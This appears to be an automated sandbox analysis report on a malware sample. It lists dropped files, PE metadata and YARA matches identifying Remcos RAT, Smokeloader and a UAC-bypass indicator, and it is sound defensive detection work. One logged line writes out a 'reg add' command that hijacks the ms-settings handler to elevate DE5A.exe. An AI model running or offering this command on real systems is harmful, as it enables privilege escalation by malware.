Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009B4D98 appears 42 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 0099B329 appears 60 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009B917B appears 36 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009C3319 appears 48 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009AFD52 appears 81 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 00997873 appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009B4CD3 appears 62 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 009B0DA0 appears 92 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: String function: 0099BD98 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FF6C99C2B10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF2BC931 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFFE99330 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFFEC1940 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF2BC93D appears 69 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF2BC265 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF2BC17B appears 38 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF2BC16F appears 334 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF241325 appears 517 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFFE9A4B0 appears 175 times
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: String function: 00007FFDFF2BC181 appears 1187 times
Source: C:\Users\user\AppData\Roaming\wsruwii Code function: String function: 00160DA0 appears 46 times
Source: C:\Users\user\AppData\Roaming\wsruwii Code function: String function: 0015FD52 appears 31 times
Source: Og1SeeXcB2.exe Static PE information: invalid certificate
Source: rar.exe.21.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.21.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.39.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.39.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: api-ms-win-core-sysinfo-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.39.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: Og1SeeXcB2.exe, 00000000.00000003.1674775597.00000000027E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeP vs Og1SeeXcB2.exe
Source: Og1SeeXcB2.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
